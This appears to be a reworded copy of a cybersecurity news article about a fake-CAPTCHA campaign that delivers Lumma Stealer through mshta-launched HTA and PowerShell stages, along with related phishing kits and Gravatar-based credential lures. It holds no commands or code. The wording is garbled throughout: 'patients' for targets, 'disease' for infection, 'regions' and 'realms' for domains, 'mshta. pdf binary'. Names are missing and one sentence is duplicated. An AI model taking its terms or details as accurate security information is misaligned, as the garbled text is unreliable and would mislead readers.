Jan 23, 2025Ravie LakshmananPhishing / Malware
Researchers studying cybersecurity are bringing attention to a recent malware attack that uses false CAPTCHA verification to provide the legendary information stealer.
” The battle is global, with Netskope Threat Labs tracking patients targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world”, Leandro Fróes, top threat research engineer at Netskope Threat Labs, said in a statement shared with The Hacker News.
” The plan also spans many industries, including healthcare, banking, and advertising, with the telecoms business having the highest number of organizations targeted”.
A sufferer visits a affected website, which points them to a fake CAPTCHA site that specifically instructs the site visitor to copy and paste a control into the Windows Run fast using the local mshta. pdf binary to download and run an HTA report from a distant server.
It’s worth noting that a previous generation of this technique, commonly known as , involved the implementation of a Base64-encoded PowerShell script to activate the Lumma Stealer disease.
In an effort to evade detection, the HTA file also executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before attempting to bypass the Windows Antimalware Scan Interface ( ) in an effort to avoid detection.
The perpetrator avoids browser-based defenses by installing and carrying out malware in such a way, Fróes explained. The victim may take all necessary actions outside of the browser context.
” The Lumma Stealer operates using the malware-as-a-service ( MaaS ) model and has been extremely active in the past months. It makes monitoring and blocking of such risks more complicated by using various shipping methods and payloads, especially when using user interactions within the system.
Lumma has also been distributed as late as this month via roughly 1, 000 fake regions that reroute users to download password-protected files in imitation of Reddit and WeTransfer.
According to Sekoia scholar crep1x, these record documents contain an AutoIT drop dubbed SelfAU3 Dropper that performs the grabber. In order to drive the Vidar Stealer trojan, threat actors in early 2023 used a similar method to roll up over 1, 300 realms masquerading as AnyDesk.
Israeli security firm Cybereason cited its extremely diverse disease vectors, including phony hacktools and comments on GitHub and YouTube, in a new thorough analysis of the stealer threat.
Barracuda Networks reported an updated version of the ( PhaaS ) toolkit ) toolkit that includes advanced features to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”
These include using reasonable, potentially compromised email addresses to send phishing emails, performing a number of preventative measures, including monitoring web inspection keystrokes, turning off the right-click context menu, and using genuine, potentially compromised email addresses to detect automated security scripts.
Social engineering-oriented token planting attacks have also been observed embracing image company Gravatar to mimic several reputable services like AT&, T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
” By exploiting Gravatar’s ‘ Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials”, SlashNext Field CTO Stephen Kowski .
” Assailants tailor their fake profiles more closely to the legitimate services they’re mimicking through less well-known or protected services” than generic phishing attempts.
Found this article interesting? Follow us on and Twitter to access more exclusive content we post.